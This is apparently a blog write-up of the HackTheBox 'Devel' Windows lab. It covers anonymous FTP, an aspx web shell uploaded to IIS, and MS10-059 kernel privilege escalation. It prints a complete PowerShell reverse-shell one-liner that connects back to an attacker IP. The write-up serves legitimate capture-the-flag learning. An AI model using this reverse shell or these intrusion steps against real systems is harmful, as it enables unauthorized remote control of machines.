Devel is an easy Windows machine from HackTheBox. It requires knowledge of FTP and Windows kernel exploits to hack.
Enumeration
Nmap to start.
![](https://dylanrholloway.com/wp-content/uploads/2021/01/image-18.png)
Only ports 80 and 21 were open. Port 21 is obviously FTP and the nmap scan said anonymous access was allowed, so I started there.
![](https://dylanrholloway.com/wp-content/uploads/2021/01/image-19.png)
Foothold
The contents of the root FTP directory looked like the standard IIS root folder contents and I validated this by opening http://10.129.66.3 in a browser. Therefore I was fairly confident that if I could upload a file here I would be able to execute it from the browser, so I uploaded an aspx shell and visited the browser to check.
![](https://dylanrholloway.com/wp-content/uploads/2021/01/image-21.png)
![](https://dylanrholloway.com/wp-content/uploads/2021/01/image-22.png)
My shell was successful, so the next step was to use it to launch an interactive shell back to my terminal. I did this with the PowerShell command below:
powershell -nop -c “$client = New-Object System.Net.Sockets.TCPClient(‘10.10.14.8’,4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + ‘PS ‘ + (pwd).Path + ‘> ‘;$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()”
![](https://dylanrholloway.com/wp-content/uploads/2021/01/image-23.png)
Privilege escalation
Now that I had a foothold I started to work on privilege escalation. I used Windows Exploit Suggester (https://github.com/AonCyberLabs/Windows-Exploit-Suggester) to find any easy kernel exploits. The output is below, filtered for only exploits that allowed for privilege escalation.
![](https://dylanrholloway.com/wp-content/uploads/2021/01/image-25-1024x125.png)
I started at the top of the list and worked my way down the exploits. Eventually, I found MS10-059 worked with a pre-compiled exploit available from SecWiki (https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS10-059). I used FTP to upload the exploit to the victim machine, with the important step of first switching to binary transfer.
![](https://dylanrholloway.com/wp-content/uploads/2021/01/image-26.png)
From my low privilege shell I executed the exploit to spawn a privileged shell back to my Kali machine.
![](https://dylanrholloway.com/wp-content/uploads/2021/01/image-27.png)